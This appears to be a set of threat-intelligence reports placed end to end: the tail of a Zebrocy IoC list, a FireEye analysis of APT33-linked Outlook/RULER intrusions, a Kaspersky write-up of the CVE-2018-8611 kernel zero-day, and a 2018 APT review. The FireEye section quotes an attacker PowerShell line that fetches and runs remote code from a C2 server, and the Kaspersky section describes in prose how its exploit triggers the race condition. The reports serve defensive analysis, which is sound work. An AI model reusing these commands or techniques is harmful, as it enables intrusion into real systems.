Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC)

NOTE

INDICATOR

2017-08-15 17:06:59

APT33 – EMPIRE (Used)

8a99624d224ab3378598b9895660c890

2017-09-15 16:49:59

APT33 – PUPYRAT (Compiled)

4b19bccc25750f49c2c1bb462509f84e

2017-11-12 20:42:43

GroupA – AUT2EXE Downloader (Compiled)

95f3bea43338addc1ad951cd2d42eb6f

2017-11-14 14:55:14

GroupA – PUPYRAT (Used)

17587668ac577fce0b278420b8eb72ac

2018-01-09 19:15:16

APT33 – PUPYRAT (Compiled)

56f5891f065494fdbb2693cfc9bce9ae

2018-02-13 13:35:06

APT33 – PUPYRAT (Used)

56f5891f065494fdbb2693cfc9bce9ae

2018-05-09 18:28:43

GroupB – AUT2EXE (Compiled)

46038aa5b21b940099b0db413fa62687

2018-07-02 07:57:40

APT33 – POSHC2 (Used)

fa7790abe9ee40556fb3c5524388de0b

2018-07-16 00:33:01

GroupB – POSHC2 (Compiled)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 01:39:58

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-07-16 08:36:13

GroupB – POWERTON (Used)

46038aa5b21b940099b0db413fa62687

2018-07-31 22:09:25

APT33 – POSHC2 (Used)

129c296c363b6d9da0102aa03878ca7f

2018-08-06 16:27:05

GroupB – POSHC2 (Compiled)

fca0ad319bf8e63431eb468603d50eff

2018-08-07 05:10:05

GroupB – POSHC2 (Used)

75e680d5fddbdb989812c7ba83e7c425

2018-08-29 18:14:18

APT33 – POSHC2 (Used)

5832f708fd860c88cbdc088acecec4ea

2018-10-09 16:02:55

APT33 – POSHC2 (Used)

8d3fe1973183e1d3b0dbec31be8ee9dd

2018-10-09 16:48:09

APT33 – POSHC2 (Used)

48d1ed9870ed40c224e50a11bf3523f8

2018-10-11 21:29:22

GroupB – POWERTON (Used)

8be06571e915ae3f76901d52068e3498

2018-12-13 11:00:00

GroupB – POWERTON (Identified)

99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)

Hash of Deobfuscated File (MD5)

Version

974b999186ff434bee3ab6d61411731f

3871aac486ba79215f2155f32d581dc2

V1

e2d60bb6e3e67591e13b6a8178d89736

2cd286711151efb61a15e2e11736d7d2

V1

bd80fcf5e70a0677ba94b3f7c011440e

5a66480e100d4f14e12fceb60e91371d

V1

4047e238bbcec147f8b97d849ef40ce5

f5ac89d406e698e169ba34fea59a780e

V2

c38069d0bc79acdc28af3820c1123e53

4aca006b9afe85b1f11314b39ee270f7

V2

N/A

7f4f7e307a11f121d8659ca98bc8ba56

V2

53ae59ed03fa5df3bf738bc0775a91d9

99649d58c0d502b2dfada02124b1504c

V2

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update

RULER.RULES

September 12, 2017 Security Update

RULER.FORMS

October 10, 2017 Security Update

RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM

SIGNATURE NAME

Endpoint Security

POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
MIMIKATZ (CREDENTIAL STEALER)
RULER OUTLOOK PERSISTENCE (UTILITY)

Network and Email Security

FE_Exploit_HTML_CVE201711774
FE_HackTool_Win_RULER
FE_HackTool_Linux_RULER
FE_HackTool_OSX_RULER
FE_Trojan_OLE_RULER
HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

Zero-day in Windows Kernel Transaction Manager (CVE-2018-8611)

Executive summary

In October 2018, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis led us to uncover a zero-day vulnerability in ntoskrnl.exe. We reported it to Microsoft on October 29, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8611. Microsoft just released a patch, part of its December update, crediting Kaspersky Lab researchers Boris Larin (Oct0xor) and Igor Soumenkov (2igosha) with the discovery.

This is the third consecutive exploited Local Privilege Escalation vulnerability in Windows we discovered this autumn using our technologies. Unlike the previously reported vulnerabilities in win32k.sys (CVE-2018-8589 and CVE-2018-8453), CVE-2018-8611 is an especially dangerous threat – a vulnerability in the Kernel Transaction Manager driver. It can also be used to escape the sandbox in modern web browsers, including Chrome and Edge, since syscall filtering mitigations do not apply to ntoskrnl.exe system calls.

Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to this zero-day and CHAINSHOT, SandCat also uses the FinFisher / FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Brief details – CVE-2018-8611 vulnerability

CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.

This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.

We have found multiple builds of exploit for this vulnerability. The latest build includes changes to reflect the latest versions of the Windows OS.

Check for the newest at the moment Windows 10 Redstone 4 Build 17133

A check for the latest build at the time of discovery: Windows 10 Redstone 4 Build 17133

Similarly to CHAINSHOT, this exploit heavily relies on the use of C++ exception handling mechanisms with custom error codes.

To abuse this vulnerability exploit first creates a named pipe and opens it for read and write. Then it creates a pair of new transaction manager objects, resource manager objects, transaction objects and creates a big number of enlistment objects for what we will call “Transaction #2”. Enlistment is a special object that is used for association between a transaction and a resource manager. When the transaction state changes associated resource manager is notified by the KTM. After that it creates one more enlistment object only now it does so for “Transaction #1” and commits all the changes made during this transaction.
After all the initial preparations have been made exploit proceeds to the second part of vulnerability trigger. It creates multiple threads and binds them to a single CPU core. One of created threads calls NtQueryInformationResourceManager in a loop, while second thread tries to execute NtRecoverResourceManager once. But the vulnerability itself is triggered in the third thread. This thread uses a trick of execution NtQueryInformationThread to obtain information on the latest executed syscall for the second thread. Successful execution of NtRecoverResourceManager will mean that race condition has occurred and further execution of WriteFile on previously created named pipe will lead to memory corruption.


Proof of concept: execution of WriteFile with buffer set to 0x41

As always, we provided Microsoft with a proof of concept for this vulnerability, along with source code. And it was later shared through Microsoft Active Protections Program (MAPP).

More information about SandCat, FruityArmor and CVE-2018-8611 is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

APT review of the year

What were the most interesting developments in terms of APT activity throughout the year and what can we learn from them?

Not an easy question to answer; everybody has partial visibility and it’s never possible to really understand the motivations of some attacks or the developments behind them. Still, with the benefit of hindsight, let’s try to approach the problem from different angles to get a better understanding of what went on.

On big actors

There are a few ‘traditional’ actors that are very well known to the security community and that everybody has been tracking for the last few years. It has been business as usual for these actors in 2018 or, if anything, perhaps slightly quieter than usual.

In reality, it is the doctrines and modi operandi of these groups that determine how they react in the event of their operations becoming public knowledge. Some actors will simply abort their campaign and go into clean-up mode, while others carry on as normal. In order to do so, it is common for some of these actors to simultaneously work on several sets of activity. This allows them to compartmentalize operations, and if they are discovered, they simply improve their toolset to avoid detection next time.

We traditionally find many Russian-speaking actors in this second group, and we would like to highlight the 2018 activity of Sofacy, Turla and CozyBear.

Sofacy was probably the most active of the three. Throughout the year we detected it in various operations, updating their toolset and being blamed by authorities for several past operations. We have seen the actor deploying Gamefish and an updated version of its DealersChoice framework against embassies and EU agencies. One of the most high-profile incidents was abuse of Computrace LoJack by this actor in order to deploy its malware on victim machines, in what can be considered a UEFI-type rootkit.

Zebrocy is one of the tools traditionally used by this actor, but in reality the collection of cases where this tool was used can be considered a subset of activity in its own right. We saw different improvements for Zebrocy’s subset, including a new custom collector/downloader, new VBA implementing anti-sandboxing techniques and new .NET modules.

During the year we understood that Sofacy appears to be changing at a structural level and is possibly already being split into different subgroups. With the OlympicDestroyer analysis we learnt that this highly sophisticated false flag operation was somehow related to Sofacy. However, we later observed more activity by the OlympicDestroyer subset in Europe and Ukraine, and it was then that we decided to treat it as the entity we call Hades.

Of particular interest is how, after the publication of the GreyEnergy set of activity that is believed to be a continuation of BlackEnergy/Sandworm, we found additional overlaps between GreyEnergy and Zebrocy, including the use of the same infrastructure and the same 0-day for ICS.

All that seems to link this new Hades actor with the Zebrocy subset of activity, traditionally attributed to Sofacy, as well as part of the BlackEnergy/GreyEnergy/Sandworm cluster.

Regarding Turla, we didn’t spot any big structural changes like those described above, though we did see this actor using some interesting implants such as LightNeuron (targeting Exchange servers as described in our previous APT summary for Q2), as well as a new backdoor that, according to ESET, infected Germany’s Federal Foreign Office in 2017, as well as other entities in the European Union.

We discovered this actor using a new variant of its Carbon malware in its traditional activity of targeting embassies and foreign affairs institutions throughout the year. It also started using a new framework that we call Phoenix, as well as (unsurprisingly) transitioning to scripting and open source tools for its lateral movement stage.

Finally, some potential CozyDuke activity was detected during November 2018, apparently targeting diplomatic and governmental entities in Europe. The TTPs do not seem to be those that are usually attributed to this actor, which opened the door to speculation about this malware being used by a different group. The facts still seem to confirm that the malware used is attributable to CozyDuke. We are still investigating this new campaign by an actor that has been inactive for months.

It’s also worth mentioning Lazarus and BlueNoroff activity in 2018. We observed constant activity from this group targeting different regions including Turkey, other parts of Asia and Latin America, as well as various lines of business that provide it with financial gain, such as casinos, financial institutions and cryptocurrencies. In its more recent campaigns it has started deploying a new malware we call ThreatNeedle.

On false flags

It comes as no surprise to find false flags every now and again, sometimes implemented rather naively. But this year we witnessed what should be considered (so far) the mother of all false flags (more details can be found here). Other than the technical details themselves, what is also worth considering is the real purpose of this attack, and why these sophisticated false flags were planted in the malware.

The first obvious conclusion is that attackers now understand very well what techniques are used by the security industry to attribute attacks, so they have abused that knowledge to fool security researchers. Another consideration is that the main objective of an attack is not necessarily related to stealing information or disrupting operations – imitating an attacker might be more important.

This may actually be part of what some actors are doing at the moment. There are several groups that were apparently inactive for some time but now appear to be back. However, they are using different TTPs that are not necessarily better. As we shall see later, a couple of examples may be CozyDuke and APT10. As a purely speculative thought, it might be that their traditional toolset is now being used by different groups, maybe still related to the original operators. The purpose might be to make attribution more difficult in the future, or simply to distract from their real ongoing operations.

The whole OlympicDestroyer story eventually resulted in the discovery of a new subset of activity related to both Sofacy and BlackEnergy that we call Hades. We will see how these more sophisticated false flags evolve in the future and how they are used to pursue less explicit goals.

On the forgotten ones

Throughout the year we also saw how several old ‘friends’ re-emerged from hibernation with new sets of activity. Here we are talking about several well-known actors that for unknown reasons (a lack of visibility might be one of them) didn’t display much activity in recent times. However, it seems they are back. In some cases they appear in different weaker forms, perhaps with different operators, or just pretending not to be in shape while they run other parallel operations; in others cases they are back with their usual capabilities.

We can summarize all this by dividing it up into the regions that showed most activity during the year. First place went to South East Asia, followed by the Middle East.

For South East Asia we can point to groups such as Kimsuky that developed a brand new toolset at the very beginning of the year, or activity that falls under the always difficult-to-attribute WinNTI ‘umbrella’. However, and most notably, we can highlight groups such as DarkHotel, LuckyMouse, or even APT10.

The OceanSalt campaign was attributed to APT10, though it’s not very clear how strong the connection is. It seems unlikely that this actor, after the public disclosure and so many years of no known activity, would return with anything that might be attributable to them. At the moment, this is difficult to assess.

LuckyMouse, the second Chinese-speaking group from this list, was very active all year. It hacked national data centers to deploy watering-hole attacks against high-profile victims in central Asia, used a driver signed by a Chinese security-related software developer, and is even suspected of being behind attacks against Oman immediately after the signing of a military agreement with India.

Scarcruft used a new backdoor we call PoorWeb, deployed a 0-day in their campaign at the beginning of the year and used Android malware specially designed for Samsung devices. DarkHotel was also back with a 0-day and new activity, targeting their traditional victims. We were able to establish a connection with a medium level of certainty between DarkHotel and the Konni/Nokki set of activity described by other vendors.

APT10 was especially active against Japanese victims, with new iterations of its malware, as was OceanLotus, which actively deployed watering holes targeting high-profile victims in South Asia with a new custom stager.

In the Middle East we observed groups such as Prince of Persia re-emerge with some activity, along with OilRig. We also detected new MuddyWaters activity, as well as GazaTeam, DesertFalcons and StrongPity among others deploying various campaigns in the region.

On the new kids

At the same time many new sets of activity emerged during the year that were also focused primarily on the Middle East and South East Asia.

This activity was driven by Asian actors such as ShaggyPanther, Sidewinder, CardinalLizard, TropicTrooper, DroppingElephant, Rancor, Tick group, NineBlog, Flyfox and CactusPete – all of them active in the region throughout the year. As a rule, these groups are not that technically advanced, using a variety of approaches to achieve their objectives. They are usually interested in regional targets, with their main objectives being governmental and also military.

In the Middle East we saw activity by LazyMerkaats, FruityArmor, OpParliament, DarkHydrus and DomesticKitten among others. Sets of activity such as that by the Gorgon group are a bit of an exception as they also target victims outside the region.

